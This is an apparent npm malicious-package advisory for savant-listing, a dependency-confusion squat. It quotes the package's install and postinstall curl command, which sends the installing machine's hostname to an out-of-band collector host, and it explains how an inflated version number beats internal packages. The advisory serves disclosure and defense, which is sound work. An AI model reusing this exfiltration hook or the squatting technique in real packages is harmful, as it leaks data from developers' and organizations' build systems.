npm · Malicious package advisory
Malwaresavant-listing
MAL-2026-5401
Malicious code in savant-listing (npm)
Details
--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (7360e78a5c5d56ea9323cde1f41e33ce8cc6b625034ef82d067bbfeafee60461) savant-listing@999.9.9 is a dependency-confusion squat. package.json declares both `install` and `postinstall` lifecycle scripts that run `curl https://d8fnie486mdq306lb5kgttwrnhxwj33g5.oast.online/info/?hostname=$(hostname)`, unconditionally exfiltrating the installer host's hostname to an out-of-band interaction (OAST/interactsh) collector on every `npm install`. The version `999.9.9` and description `SAFE PoC - Demonstrates dependency confusion` are consistent with a package published to the public registry to win version resolution over an internal package of the same name on victim build systems. The destination is a transient, attacker-controlled OAST subdomain not associated with any legitimate publisher; the harm fires automatically at install time without any user interaction.
Compromised versions (2)
- 999.9.10
- 999.9.9
Any computer that installed or ran a compromised version should be considered fully compromised. Rotate every secret on that machine from a clean environment.